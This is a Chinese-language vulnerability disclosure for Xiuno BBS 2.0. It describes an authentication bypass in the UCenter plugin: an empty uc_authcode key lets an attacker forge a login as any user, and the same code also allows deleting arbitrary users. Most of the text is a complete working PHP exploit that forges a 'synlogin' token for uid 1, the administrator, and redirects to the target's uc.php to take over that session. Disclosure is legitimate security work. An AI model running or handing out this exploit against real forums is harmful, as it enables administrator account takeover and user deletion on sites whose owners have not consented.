Xiuno BBS 2.0 前台认证授权绕过漏洞

作者:ztz@Dis9Team

0×0 漏洞概述

xiuno 实现了一个通过 UCenter 接口完成 UC 同步登录的插件,但 xiuno 默认并不启用该插件。在未启用状态下,插件的密钥 uc_appkey 为空字符串,而插件自带的加解密函数 uc_authcode() 仍然会用这个空 key 去解密传入的数据:其密钥流和 16 位截断 md5 校验值都是由 key 派生的,因此攻击者只要同样以空 key 调用 uc_authcode() 进行 ENCODE,就能伪造出能通过校验的密文,从而绕过认证(按作者的利用方式,插件未启用时 /plugin/ucenter/api/uc.php 这个入口仍可被访问)。服务端用 key 解密 code 参数后,若解密结果中的 action 等于 synlogin 且 uid 有效,就会直接以该 uid 登录 xiuno 论坛前台;同一段代码中 action 为 deleteuser 时还可以删除任意 uid 的用户(见下文代码解析)。

0×1 代码解析

此版本为2.0 $code = core::gpc('code' ); //将传入的code参数用key解密然后放入get数组中 parse_str(uc_authcode ($code, 'DECODE' , $ucconf['uc_appkey']), $get); $action = $get['action']; //若action为synlogin,则用get数组中uid作为当前用户登录 elseif($action == 'synlogin' ) { $uid = intval($get[ 'uid']); $muser = new user(); $userdb = $muser->read($uid); $muser->set_login_cookie($userdb); exit(API_RETURN_SUCCEED); } //同时此处还有一个任意用户删除漏洞 elseif($action == 'deleteuser' ) { $uids = $get[ 'ids']; $uids = str_replace( "'", '' , $uids); $arr = explode( ',', $uids); $muser = new user(); foreach($arr as $uid) { $uid = intval($uid); $muser->xdelete($uid); } exit(API_RETURN_SUCCEED); }  

0×2 PoC

  <?php /* * Xiuno bbs RC2 前台授权绕过漏洞exp * Author: ztz@Dis9Team * Mail: ztz5651483@gmail.com * Blog: ztz.fuzzexp.org * 使用说明: * $_GET['target']: 目标的域名 * $_GET['ip']: 目标的ip * * 如: * http://yoursite.com/xiuno.php?target=www.xiuno.com&ip=114.113.224.156 * 然后手动访问主页即可 */ function uc_authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } function send($request, $ip) { $result = ''; $meta = parse_url($request); $path = isset($meta['path']) ? $meta['path'] : exit('path error'); $host = isset($meta['host']) ? $meta['host'] : exit('host error'); $query = isset($meta['query']) ? 
$meta['query'] : exit('query error'); $packet = "GET $path?$query HTTP/1.1\r\n"; $packet .= "User-Agent: Mozilla/5.0\r\n"; $packet .= "Host: ".$ip."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $fp = fsockopen($ip, 80); fputs($fp, $packet); while(!feof($fp)) { $result .= fgets($fp,4096); } if(strpos($result, 'Set-Cookie') > 0) { $begin = strpos($result, 'Set-Cookie:'); $end = strpos($result, ";", $begin); $cookie = substr($result, $begin + 11, $end - $begin - 11); return $cookie; } } $target = $_GET['target']; $ip = $_GET['ip']; $time = time(); $str = "time=$time&action=synlogin&uid=1"; $en_str = uc_authcode($str, 'ENCODE', ''); $request = "http://$target/plugin/ucenter/api/uc.php?code=".urlencode($en_str); header("Location: $request", true, 302); ?>    
